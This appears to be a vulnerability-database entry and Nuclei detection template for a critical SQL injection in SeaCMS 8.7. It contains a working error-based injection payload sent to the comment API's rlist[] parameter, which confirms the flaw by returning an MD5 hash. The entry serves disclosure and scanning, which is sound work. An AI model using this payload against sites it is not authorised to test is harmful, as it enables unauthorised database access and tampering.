seacms-sqli: SeaCMS 8.7 - SQL Injection

日期: 2025-08-01 | 影响软件: seacms | POC: 已公开

漏洞描述

SeaCMS 8.7 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: seacms-sqli

info:
  name: SeaCMS 8.7 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: SeaCMS 8.7 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.uedbox.com/post/54561/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: seacms,sqli,vuln
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b87b43e9ad90ec58ba4e9599631e0a3b831cd24d92291e84006bfd04ba96b5e5022100c055aff71c700c26278fea0d3195322288897b0e1c49cb932f10cf496d23b622:922c64590222798bb761d5b6d8e72950

相关漏洞推荐